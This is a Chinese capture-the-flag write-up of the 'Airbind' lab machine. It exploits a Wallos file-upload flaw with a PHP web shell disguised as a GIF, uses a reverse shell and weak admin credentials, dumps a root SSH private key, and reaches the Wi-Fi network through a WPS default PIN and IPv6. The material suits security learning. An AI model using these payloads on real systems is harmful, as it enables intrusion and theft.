hmv[-_-]Airbind

Airbind

image-20240912140731229

image-20240912143633016

一看是自家路由器。。。看来机器搞错了,尝试重新导入:

image-20241213224256153

依然扫不到,尝试接着搞吧!重新导入,处理器和内存翻倍,但仍然不行。。。。然后改了一手桥接发现行了!

image-20241214105313554

信息搜集

端口扫描

┌──(kali💀kali)-[~/temp/Airbind]
└─$ IP=10.0.2.21           

┌──(kali💀kali)-[~/temp/Airbind]
└─$ rustscan -a $IP -- -sCV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 10.0.2.21:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

PORT   STATE SERVICE REASON  VERSION
80/tcp open  http    syn-ack Apache httpd 2.4.57 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.57 (Ubuntu)
| http-title: Wallos - Subscription Tracker
|_Requested resource was login.php
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-favicon: Unknown favicon MD5: 81452C705B6AAB657F745B6FB4966367

目录扫描

┌──(kali💀kali)-[~/temp/Airbind]
└─$ feroxbuster -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -d 1 -s 200 301 302 

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.4
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.0.2.21
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ [200, 301, 302]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.4
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 1
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
302      GET        0l        0w        0c http://10.0.2.21/ => login.php
301      GET        9l       28w      307c http://10.0.2.21/images => http://10.0.2.21/images/
301      GET        9l       28w      308c http://10.0.2.21/scripts => http://10.0.2.21/scripts/
301      GET        9l       28w      312c http://10.0.2.21/screenshots => http://10.0.2.21/screenshots/
301      GET        9l       28w      309c http://10.0.2.21/includes => http://10.0.2.21/includes/
301      GET        9l       28w      303c http://10.0.2.21/db => http://10.0.2.21/db/
301      GET        9l       28w      307c http://10.0.2.21/styles => http://10.0.2.21/styles/
301      GET        9l       28w      305c http://10.0.2.21/libs => http://10.0.2.21/libs/
[###>----------------] - 5m     36589/220553  27m     found:8       errors:2      
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_10_0_2_21-1734145306.state ...
[###>----------------] - 5m     36589/220553  27m     found:8       errors:2      
[###>----------------] - 5m     36575/220546  114/s   http://10.0.2.21/

漏洞发现

踩点

┌──(kali💀kali)-[~/temp/Airbind]
└─$ whatweb http://$IP                            
http://10.0.2.21 [302 Found] Apache[2.4.57], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.57 (Ubuntu)], IP[10.0.2.21], RedirectLocation[login.php]
http://10.0.2.21/login.php [200 OK] Apache[2.4.57], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.57 (Ubuntu)], IP[10.0.2.21], PasswordField[password], Title[Wallos - Subscription Tracker]

发现了疑似框架,尝试检索一下:

image-20241214105749024

得看一下版本号对不对:

┌──(kali💀kali)-[~/temp/Airbind]
└─$ curl -s http://$IP/login.php                                                   
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <meta name="theme-color" content="#FFFFFF"/>
    <title>Wallos - Subscription Tracker</title>
    <link rel="icon" type="image/png" href="images/icon/favicon.ico" sizes="16x16">
    <link rel="apple-touch-icon" sizes="180x180" href="images/icon/apple-touch-icon.png">
    <link rel="manifest" href="manifest.json">
    <link rel="stylesheet" href="styles/login.css?v1.11.0">
    <link rel="stylesheet" href="styles/barlow.css">
    <link rel="stylesheet" href="styles/login-dark-theme.css?v1.11.0" id="dark-theme" disabled>
</head>
<body>
    <div class="content">
        <section class="container">
            <header>
                 <img src="images/wallossolid.png" alt="Wallos Logo" title="Wallos - Subscription Tracker" />                 <p>
                    Please login                </p>
            </header>
            <form action="login.php" method="post">
                <div class="form-group">
                    <label for="username">Username:</label>
                    <input type="text" id="username" name="username" required>
                </div>
                <div class="form-group">
                    <label for="password">Password:</label>
                    <input type="password" id="password" name="password" required>
                </div>
                <div class="form-group-inline">
                    <input type="checkbox" id="remember" name="remember">
                    <label for="remember">Stay logged in (30 days)</label>
                </div>
                                <div class="form-group">
                    <input type="submit" value="Login">
                </div>
            </form>
        </section>
    </div>
</body>
</html>                

发现版本号疑似1.11.0,尝试进行利用!

文件上传漏洞利用

┌──(kali💀kali)-[~/temp/Airbind]
└─$ searchsploit -m php/webapps/51924.txt
  Exploit: Wallos < 1.11.2 - File Upload RCE
      URL: https://www.exploit-db.com/exploits/51924
     Path: /usr/share/exploitdb/exploits/php/webapps/51924.txt
    Codes: N/A
 Verified: False
File Type: ASCII text
Copied to: /home/kali/temp/Airbind/51924.txt

┌──(kali💀kali)-[~/temp/Airbind]
└─$ ls
51924.txt  ferox-http_10_0_2_21-1734144980.state

┌──(kali💀kali)-[~/temp/Airbind]
└─$ cat 51924.txt               
# Exploit Title: Wallos - File Upload RCE (Authenticated)
# Date: 2024-03-04
# Exploit Author: sml@lacashita.com
# Vendor Homepage: https://github.com/ellite/Wallos
# Software Link: https://github.com/ellite/Wallos
# Version: < 1.11.2
# Tested on: Debian 12

Wallos allows you to upload an image/logo when you create a new subscription.
This can be bypassed to upload a malicious .php file.

POC
---

1) Log into the application.
2) Go to "New Subscription"
3) Upload Logo and choose your webshell .php
4) Make the Request changing Content-Type to image/jpeg and adding "GIF89a", it should be like:

--- SNIP -----------------

POST /endpoints/subscription/add.php HTTP/1.1

Host: 192.168.1.44

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.1.44/

Content-Type: multipart/form-data; boundary=---------------------------29251442139477260933920738324

Origin: http://192.168.1.44

Content-Length: 7220

Connection: close

Cookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="name"

test

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo"; filename="revshell.php"

Content-Type: image/jpeg

GIF89a;

<?php
system($_GET['cmd']);
?>

-----------------------------29251442139477260933920738324

Content-Disposition: form-data; name="logo-url"

----- SNIP -----

5) You will get the response that your file was uploaded ok:

{"status":"Success","message":"Subscription updated successfully"}

6) Your file will be located in:
http://VICTIM_IP/images/uploads/logos/XXXXXX-yourshell.php   

弱密码

尝试按照教程进行利用一下!但是发现没有用户和密码,尝试一下弱口令,发现admin:admin可以正常进入。

其实这一个也泄露过,但是之前没发现:

image-20241214110824890

┌──(kali💀kali)-[~/temp/Airbind]
└─$ curl -s http://10.0.2.21/db/ | html2text
****** Index of /db ******
[[ICO]]       Name             Last_modified    Size Description
===========================================================================
[[PARENTDIR]] Parent_Directory                    -  
[[   ]]       wallos.db        2024-12-14 03:05  64K  
===========================================================================
     Apache/2.4.57 (Ubuntu) Server at 10.0.2.21 Port 80

┌──(kali💀kali)-[~/temp/Airbind]
└─$ wget http://10.0.2.21/db/wallos.db            
--2024-12-13 22:09:59--  http://10.0.2.21/db/wallos.db
Connecting to 10.0.2.21:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 65536 (64K)
Saving to: ‘wallos.db’

wallos.db                                       100%[====================================================================================================>]  64.00K  --.-KB/s    in 0.003s  

2024-12-13 22:10:00 (21.1 MB/s) - ‘wallos.db’ saved [65536/65536]

┌──(kali💀kali)-[~/temp/Airbind]
└─$ sqlite3 wallos.db
SQLite version 3.45.1 2024-01-30 16:01:20
Enter ".help" for usage hints.
sqlite> .tables
categories                     login_tokens                 
currencies                     migrations                   
cycles                         notifications                
fixer                          payment_methods              
frequencies                    settings                     
household                      subscriptions                
last_exchange_update           user                         
last_update_next_payment_date
sqlite> select * from user;
1|admin|admin@localhost.com|$2y$10$2XxuEupev6gU1qWoURsIYu7XHNiy7nve9iq7H0mUX/MzFnmvbxC9S|1|0|en

查一下也是admin.

image-20241214112004836

image-20241214112012516

抓包改包

先准备一个反弹shell!

┌──(kali💀kali)-[~/temp/Airbind]
└─$ vim shell.php

┌──(kali💀kali)-[~/temp/Airbind]
└─$ head shell.php                                                                  
GIF89a;
  <?php
  // php-reverse-shell - A Reverse Shell implementation in PHP
  // Copyright (C) 2007 pentestmonkey@pentestmonkey.net

  set_time_limit (0);
  $VERSION = "1.0";
  $ip = '192.168.10.103';  // You have changed this
  $port = 1234;  // And this
  $chunk_size = 1400;

然后添加订阅!

image-20241214113232682

改个包:

Content-Type: application/x-php

Content-Type: image/jpeg

然后保存一下,访问一下:

image-20241214113328593

image-20241214113737918

然后尝试访问激活:

image-20241214113845713

但是不行,老老实实一句话吧。。。。

GIF89a;

<?php
system($_GET['cmd']);
?>

再进行尝试!

┌──(kali💀kali)-[~/temp/Airbind]
└─$ curl 'http://10.0.2.21/images/uploads/logos/1734147609-shell.php?cmd=whoami'
GIF89a;

www-data

成功,尝试反弹shell!(突然想起来失败可能是因为我的那个shell的ip填错了。。。。。于是我重新尝试了一下,发现成功了。。。。)

image-20241214114414574

提权

信息搜集

(remote) www-data@ubuntu:/$ whoami;id;hostname
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ubuntu
(remote) www-data@ubuntu:/$ sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User www-data may run the following commands on ubuntu:
    (ALL) NOPASSWD: ALL
(remote) www-data@ubuntu:/$ sudo su
root@ubuntu:/# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/# pwd
/
root@ubuntu:/# cd ~
root@ubuntu:~# pwd
/root
root@ubuntu:~# ls -la
total 40
drwx------  4 root root 4096 May 21  2024 .
drwxr-xr-x 17 root root 4096 Dec 14 02:52 ..
lrwxrwxrwx  1 root root    9 Apr  2  2024 .bash_history -> /dev/null
-rw-r--r--  1 root root 3106 Oct 17  2022 .bashrc
-rw-------  1 root root   20 May 21  2024 .lesshst
drwxr-xr-x  3 root root 4096 Apr  1  2024 .local
-rw-r--r--  1 root root  161 Jul  9  2019 .profile
-rw-r--r--  1 root root   66 May 21  2024 .selected_editor
-rw-------  1 root root  300 May 21  2024 .sqlite_history
drwx------  2 root root 4096 Apr  2  2024 .ssh
-rwx------  1 root root   33 Apr  2  2024 user.txt
-rw-------  1 root root    0 May 21  2024 .wpa_cli_history

但是只有一个user的flag以及私钥,先保存下来:

root@ubuntu:~/.ssh# cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
EkGwPez9XGBEUAAAALcm9vdEB1YnVudHU=
-----END OPENSSH PRIVATE KEY-----
root@ubuntu:~/.ssh# cat id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDOGLwLC++2wqYpp9eCUepbIJOOLLjBJ9STAaVCQn5+Vi2FNUEAn8sbE+QSNKLkbp4FjIwT0+bzEFtpxLUluvXwhgg9jLR+72PsxdFOm9hMhMciuTeDaguz7Z/4iFmqbVxWvgyBOPGXrb+FxmghmgAvPTa4XOZ2I5zX2ausP5xWiinSCkblUwjqkLAXd+IrXupZvKO3raLtWyuFDyQxZpPsdcErfSTToTIGVQrixEtquv+swKpIKon9PAk/dyzh37kuywvFhEjEkyHoH3iZPsrcwDTfh7g+lTPx+vDV5PsXJR3xcayKla4oCbA9XKY0YRAW8poYnogwsXpvkoVF7KCZ9iQYEs2OE/XBoNTs3GpWuIo3n0MZ5sx+9bysiWX+wg+rIQk5Ov7sQXvgO/Teqd4faEyuC7sO6iefuwz0NSAC70JFdqLdzE8VAyiSYRltuV/DAlZrD3jDhyrNWx6dfkZDEVsBR9JgN2tj6qY7z7Gv0U/XgNt89u+f4Kh/Qbiwv30= root@ubuntu

然后接着找:

root@ubuntu:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether dc:a1:f7:82:76:13 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.0.3.241/24 brd 10.0.3.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::dea1:f7ff:fe82:7613/64 scope link 
       valid_lft forever preferred_lft forever
3: wlan0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN group default qlen 1000
    link/ether 02:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff
6: ap0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000
    link/ether 42:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff

解法一:IPV6绕过iptables

详情参考:https://www.bilibili.com/video/BV1j442197dv/

┌──(kali💀kali)-[~/temp/Airbind]
└─$ ping6 -I eth0 ff02::1
ping6: Warning: source address might be selected on device other than: eth0
PING ff02::1 (ff02::1) from :: eth0: 56 data bytes
64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=1 ttl=64 time=0.025 ms
64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=1 ttl=64 time=2.10 ms
64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=2 ttl=64 time=0.031 ms
64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=2 ttl=64 time=0.806 ms
64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=3 ttl=64 time=0.034 ms
64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=3 ttl=64 time=0.742 ms
64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=4 ttl=64 time=0.034 ms
64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=4 ttl=64 time=1.08 ms
64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=5 ttl=64 time=0.034 ms
64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=5 ttl=64 time=1.33 ms
^C
--- ff02::1 ping statistics ---
5 packets transmitted, 5 received, +5 duplicates, 0% packet loss, time 4031ms
rtt min/avg/max/mdev = 0.025/0.621/2.096/0.683 ms

┌──(kali💀kali)-[~/temp/Airbind]
└─$ chmod 600 id_rsa 

┌──(kali💀kali)-[~/temp/Airbind]
└─$ ssh root@fe80::99b:2e02:395e:4e6f%eth0 -i id_rsa
The authenticity of host 'fe80::99b:2e02:395e:4e6f%eth0 (fe80::99b:2e02:395e:4e6f%eth0)' can't be established.
ED25519 key fingerprint is SHA256:8cphJbastRTfWZolTBt5XJJ1GFOq9EbCLKKGghygXSo.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:33: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'fe80::99b:2e02:395e:4e6f%eth0' (ED25519) to the list of known hosts.
root@fe80::99b:2e02:395e:4e6f%eth0's password: 

┌──(kali💀kali)-[~/temp/Airbind]
└─$ ls -la
total 180
drwxr-xr-x   2 kali kali  4096 Dec 13 22:55 .
drwxr-xr-x 136 kali kali  4096 Oct  9 02:52 ..
-rw-r--r--   1 kali kali  1808 Dec 13 22:00 51924.txt
-rw-r--r--   1 kali kali 81719 Dec 13 21:56 ferox-http_10_0_2_21-1734144980.state
-rw-r--r--   1 kali kali  5996 Dec 13 22:01 ferox-http_10_0_2_21-1734145306.state
-rw-r--r--   1 kali kali    61 Dec 13 22:13 hash
-rw-------   1 kali kali  2590 Dec 13 22:55 id_rsa
-rw-r--r--   1 kali kali   565 Dec 13 22:55 id_rsa.pub
-rw-r--r--   1 kali kali  3919 Dec 13 22:30 shell.php
-rw-r--r--   1 kali kali 65536 Dec 13 22:05 wallos.db

┌──(kali💀kali)-[~/temp/Airbind]
└─$ chmod 600 id_rsa

┌──(kali💀kali)-[~/temp/Airbind]
└─$ ssh root@fe80::a00:27ff:fe1b:404c%eth0 -i id_rsa
The authenticity of host 'fe80::a00:27ff:fe1b:404c%eth0 (fe80::a00:27ff:fe1b:404c%eth0)' can't be established.
ED25519 key fingerprint is SHA256:La9YyHs4GERVO8XTRRw0cLh6XcInXX35Ar9OiMsXwQk.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:89: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'fe80::a00:27ff:fe1b:404c%eth0' (ED25519) to the list of known hosts.
Linux airbind 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@airbind:~# whoami;id;ls -la
root
uid=0(root) gid=0(root) groupes=0(root)
total 32
drwx------  5 root root 4096 21 mai    2024 .
drwxr-xr-x 18 root root 4096  1 avril  2024 ..
lrwxrwxrwx  1 root root    9  9 mars   2024 .bash_history -> /dev/null
-rw-r--r--  1 root root  571 10 avril  2021 .bashrc
drwx------  2 root root 4096  2 avril  2024 .config
drwxr-xr-x  3 root root 4096  1 avril  2024 .local
-rw-r--r--  1 root root  161  9 juil.  2019 .profile
-rwx------  1 root root   33  2 avril  2024 root.txt
drwx------  2 root root 4096  2 avril  2024 .ssh

原理大概是主机设置了一个ip的过滤,不能从一般途径进行登录,但是ipv6协议恰好可以绕过这个过滤。

从这里可以看到失败的原因可能是虚拟机内的那个wifi网卡和我本地的网卡冲突了。

方法二:作者解法

先扫描了一下这个开放的无线端口的信息。

root@ubuntu:~# iwlist wlan0 scanning
wlan0     Scan completed :
          Cell 01 - Address: 02:00:00:00:01:00
                    Channel:7
                    Frequency:2.442 GHz (Channel 7)
                    Quality=70/70  Signal level=-30 dBm  
                    Encryption key:on
                    ESSID:"TL-WR842ND"
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              9 Mb/s; 12 Mb/s; 18 Mb/s
                    Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
                    Mode:Master
                    Extra:tsf=0006293310197962
                    Extra: Last beacon: 80ms ago
                    IE: Unknown: 000A544C2D57523834324E44
                    IE: Unknown: 010882848B960C121824
                    IE: Unknown: 030107
                    IE: Unknown: 2A0104
                    IE: Unknown: 32043048606C
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : CCMP
                        Pairwise Ciphers (1) : CCMP
                        Authentication Suites (1) : PSK
                    IE: Unknown: 3B025100
                    IE: Unknown: 7F080400400200000040
                    IE: Unknown: DDA90050F204104A00011010440001021041000101101200020000105300022108103B00010310470010572CF82FC95756539B16B5CFB298ABF11021000754502D4C494E4B1023000A544C2D57523834324E4410240001201042001D51514848302D36465943582D45515A52502D4C585642302D37423848531054000800010050F20400011011000A544C2D57523834324E441008000221081049000E00372A0001200106FFFFFFFFFFFF

找到了版本号,然后找到手册,查看一下默认pin码:

image-20241214120926862

image-20241214121121612

image-20241214121158040

然后尝试使用wpa_supplicant对无线设施进行控制,配置一下文件:

image-20241214121451498

/etc/wpa_supplicant/wpa_supplicant.conf
ctrl_interface=/run/wpa_supplicant
update_config=1

进行添加:

#~/wpa_supplicant.conf
ctrl_interface=/var/run/wpa_supplicant
update_config=1

然后尝试进行在后台初始化:

root@ubuntu:~# wpa_supplicant -i wlan0 -c wpa_supplicant.conf -B
Successfully initialized wpa_supplicant
rfkill: Cannot open RFKILL control device
rfkill: Cannot get wiphy information

然后尝试进行连接:

root@ubuntu:~# wpa_cli
wpa_cli v2.10
Copyright (c) 2004-2022, Jouni Malinen <j@w1.fi> and contributors

This software may be distributed under the terms of the BSD license.
See README for more details.

Selected interface 'wlan0'

Interactive mode

> wps_pin any 55117319
55117319
<3>CTRL-EVENT-NETWORK-ADDED 0
<3>WPS-PIN-ACTIVE 
<3>CTRL-EVENT-SCAN-STARTED 
<3>CTRL-EVENT-SCAN-RESULTS 
<3>WPS-AP-AVAILABLE-AUTH 
<3>SME: Trying to authenticate with 02:00:00:00:01:00 (SSID='TL-WR842ND' freq=2442 MHz)
<3>Trying to associate with 02:00:00:00:01:00 (SSID='TL-WR842ND' freq=2442 MHz)
<3>Associated with 02:00:00:00:01:00
<3>CTRL-EVENT-SUBNET-STATUS-UPDATE status=0
<3>CTRL-EVENT-EAP-STARTED EAP authentication started
<3>CTRL-EVENT-EAP-STATUS status='started' parameter=''
<3>CTRL-EVENT-EAP-PROPOSED-METHOD vendor=14122 method=1
<3>CTRL-EVENT-EAP-STATUS status='accept proposed method' parameter='WSC'
<3>CTRL-EVENT-EAP-METHOD EAP vendor 14122 method 1 (WSC) selected
<3>WPS-CRED-RECEIVED 
<3>WPS-SUCCESS 
<3>CTRL-EVENT-EAP-STATUS status='completion' parameter='failure'
<3>CTRL-EVENT-EAP-FAILURE EAP authentication failed
<3>CTRL-EVENT-DISCONNECTED bssid=02:00:00:00:01:00 reason=3 locally_generated=1
<3>CTRL-EVENT-DSCP-POLICY clear_all
<3>SME: Trying to authenticate with 02:00:00:00:01:00 (SSID='TL-WR842ND' freq=2442 MHz)
<3>Trying to associate with 02:00:00:00:01:00 (SSID='TL-WR842ND' freq=2442 MHz)
<3>Associated with 02:00:00:00:01:00
<3>CTRL-EVENT-SUBNET-STATUS-UPDATE status=0
<3>WPA: Key negotiation completed with 02:00:00:00:01:00 [PTK=CCMP GTK=CCMP]
<3>CTRL-EVENT-CONNECTED - Connection to 02:00:00:00:01:00 completed [id=0 id_str=]

发现链接上去了。

root@ubuntu:~# dhclient wlan0
root@ubuntu:~# cat wpa_supplicant.conf 
ctrl_interface=/var/run/wpa_supplicant
update_config=1

network={
        ssid="TL-WR842ND"
        psk="leEAYAejoIDJ7pU4jykJ7kCkEh3gx1"
        proto=RSN
        key_mgmt=WPA-PSK
        pairwise=CCMP-256 GCMP-256 CCMP GCMP
        group=CCMP-256 GCMP-256 CCMP GCMP TKIP
        auth_alg=OPEN
        mesh_fwding=1
        pbss=2
}
root@ubuntu:~# route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
0.0.0.0         10.0.3.1        0.0.0.0         UG    0      0        0 eth0
10.0.3.0        0.0.0.0         255.255.255.0   U     0      0        0 eth0
192.168.10.0    0.0.0.0         255.255.255.0   U     0      0        0 wlan0

然后就是写脚本尝试利用:

#!/bin/bash

for ip in {1..255} ; do
    timeout 1 bash -c "echo > /dev/tcp/192.168.10.$ip/22 2>/dev/null"
    [[ $? -eq 0 ]] && echo "192.168.10.$ip UP"
done
root@ubuntu:/tmp# nano exp
root@ubuntu:/tmp# cat exp
#!/bin/bash

for ip in {1..255} ; do
        timeout 1 bash -c "echo > /dev/tcp/192.168.10.$ip/22 2>/dev/null"
    [[ $? -eq 0 ]] && echo "192.168.10.$ip UP"
done
root@ubuntu:/tmp# chmod +x *
root@ubuntu:/tmp# bash exp
192.168.10.1 UP
^C^C^C^C^C^C^C^C^C^C
^C^Z
[1]+  Stopped                 bash exp
root@ubuntu:/tmp# cd ~
root@ubuntu:~# ssh 192.168.10.
ssh: Could not resolve hostname 192.168.10.: Name or service not known
